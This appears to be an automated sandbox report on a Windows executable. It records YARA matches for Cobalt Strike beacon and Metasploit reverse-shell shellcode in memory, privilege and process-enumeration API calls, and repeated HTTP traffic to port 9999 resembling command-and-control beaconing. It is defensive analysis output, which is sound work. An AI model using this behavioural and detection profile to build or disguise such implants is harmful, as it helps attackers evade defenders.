Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D73751 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_03D73751

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D78FCB _memset,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,CloseHandle,CloseHandle,OpenProcess,ProcessIdToSessionId,CloseHandle,Process32Next,CloseHandle,

0_2_03D78FCB

Source: vNenBbeRFZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vNenBbeRFZ.exe	ReversingLabs: Detection: 92%
Source: vNenBbeRFZ.exe	Virustotal: Detection: 84%

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: wininetlui.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: cryptbase.dll			Jump to behavior

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Data Obfuscation

Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D96BD4 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,

0_2_03D96BD4

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D8C35C push 9403D8C3h; ret		0_2_03D8C361
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D99B73 push 0000006Ah; retf		0_2_03D99BE4
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D99B75 push 0000006Ah; retf		0_2_03D99BE4
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D99B0B push 0000006Ah; retf		0_2_03D99BE4
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D88221 push ecx; ret		0_2_03D88234
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03984112 push edi; ret		0_2_03984113
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0398583E push dword ptr [ecx-75h]; iretd		0_2_03985846
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0398B7AA push 941001C3h; ret		0_2_0398B7AF
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0398766F push ecx; ret		0_2_03987682

Hooking and other Techniques for Hiding and Protection

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 57241 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57241
Source: unknown	Network traffic detected: HTTP traffic on port 57242 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57242
Source: unknown	Network traffic detected: HTTP traffic on port 57243 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57243
Source: unknown	Network traffic detected: HTTP traffic on port 57244 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57244
Source: unknown	Network traffic detected: HTTP traffic on port 57245 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57245
Source: unknown	Network traffic detected: HTTP traffic on port 57246 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57246
Source: unknown	Network traffic detected: HTTP traffic on port 57247 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57247
Source: unknown	Network traffic detected: HTTP traffic on port 57248 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57248
Source: unknown	Network traffic detected: HTTP traffic on port 57249 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57249
Source: unknown	Network traffic detected: HTTP traffic on port 57250 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57250
Source: unknown	Network traffic detected: HTTP traffic on port 57251 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57251
Source: unknown	Network traffic detected: HTTP traffic on port 57252 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57252
Source: unknown	Network traffic detected: HTTP traffic on port 57253 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57253
Source: unknown	Network traffic detected: HTTP traffic on port 57254 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57254
Source: unknown	Network traffic detected: HTTP traffic on port 57255 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57255
Source: unknown	Network traffic detected: HTTP traffic on port 57256 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57256
Source: unknown	Network traffic detected: HTTP traffic on port 57257 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57257
Source: unknown	Network traffic detected: HTTP traffic on port 57258 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57258
Source: unknown	Network traffic detected: HTTP traffic on port 57259 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57259
Source: unknown	Network traffic detected: HTTP traffic on port 57260 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57260
Source: unknown	Network traffic detected: HTTP traffic on port 57261 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57261
Source: unknown	Network traffic detected: HTTP traffic on port 57262 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57262
Source: unknown	Network traffic detected: HTTP traffic on port 57263 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57263
Source: unknown	Network traffic detected: HTTP traffic on port 57264 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57264
Source: unknown	Network traffic detected: HTTP traffic on port 57265 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57265
Source: unknown	Network traffic detected: HTTP traffic on port 54000 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54000
Source: unknown	Network traffic detected: HTTP traffic on port 54001 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54001
Source: unknown	Network traffic detected: HTTP traffic on port 54002 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54002
Source: unknown	Network traffic detected: HTTP traffic on port 54003 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54003
Source: unknown	Network traffic detected: HTTP traffic on port 54004 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54004
Source: unknown	Network traffic detected: HTTP traffic on port 54005 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54005
Source: unknown	Network traffic detected: HTTP traffic on port 54006 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54006
Source: unknown	Network traffic detected: HTTP traffic on port 54007 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54007
Source: unknown	Network traffic detected: HTTP traffic on port 54008 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54008
Source: unknown	Network traffic detected: HTTP traffic on port 54009 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54009
Source: unknown	Network traffic detected: HTTP traffic on port 54011 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54011
Source: unknown	Network traffic detected: HTTP traffic on port 54012 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54012
Source: unknown	Network traffic detected: HTTP traffic on port 54022 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54022
Source: unknown	Network traffic detected: HTTP traffic on port 54029 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54029
Source: unknown	Network traffic detected: HTTP traffic on port 54035 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54035
Source: unknown	Network traffic detected: HTTP traffic on port 54046 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54046
Source: unknown	Network traffic detected: HTTP traffic on port 54052 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54052
Source: unknown	Network traffic detected: HTTP traffic on port 54058 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54058
Source: unknown	Network traffic detected: HTTP traffic on port 54067 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54067
Source: unknown	Network traffic detected: HTTP traffic on port 54075 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54075
Source: unknown	Network traffic detected: HTTP traffic on port 54076 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54076
Source: unknown	Network traffic detected: HTTP traffic on port 54087 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54087
Source: unknown	Network traffic detected: HTTP traffic on port 54093 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54093
Source: unknown	Network traffic detected: HTTP traffic on port 54099 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54099
Source: unknown	Network traffic detected: HTTP traffic on port 54110 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54110
Source: unknown	Network traffic detected: HTTP traffic on port 54116 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54116
Source: unknown	Network traffic detected: HTTP traffic on port 54123 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54123
Source: unknown	Network traffic detected: HTTP traffic on port 54132 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54132
Source: unknown	Network traffic detected: HTTP traffic on port 54137 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54137
Source: unknown	Network traffic detected: HTTP traffic on port 54141 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54141
Source: unknown	Network traffic detected: HTTP traffic on port 54147 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54147
Source: unknown	Network traffic detected: HTTP traffic on port 54151 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54151
Source: unknown	Network traffic detected: HTTP traffic on port 54157 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54157
Source: unknown	Network traffic detected: HTTP traffic on port 54167 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54167
Source: unknown	Network traffic detected: HTTP traffic on port 54174 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54174
Source: unknown	Network traffic detected: HTTP traffic on port 54180 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54180
Source: unknown	Network traffic detected: HTTP traffic on port 54190 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54190
Source: unknown	Network traffic detected: HTTP traffic on port 54197 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54197
Source: unknown	Network traffic detected: HTTP traffic on port 54203 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54203
Source: unknown	Network traffic detected: HTTP traffic on port 54209 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54209
Source: unknown	Network traffic detected: HTTP traffic on port 54220 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54220
Source: unknown	Network traffic detected: HTTP traffic on port 54226 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54226
Source: unknown	Network traffic detected: HTTP traffic on port 54235 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 54241 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54241
Source: unknown	Network traffic detected: HTTP traffic on port 54249 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54249
Source: unknown	Network traffic detected: HTTP traffic on port 54255 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54255
Source: unknown	Network traffic detected: HTTP traffic on port 54264 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54264
Source: unknown	Network traffic detected: HTTP traffic on port 54271 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54271
Source: unknown	Network traffic detected: HTTP traffic on port 54278 -> 9999
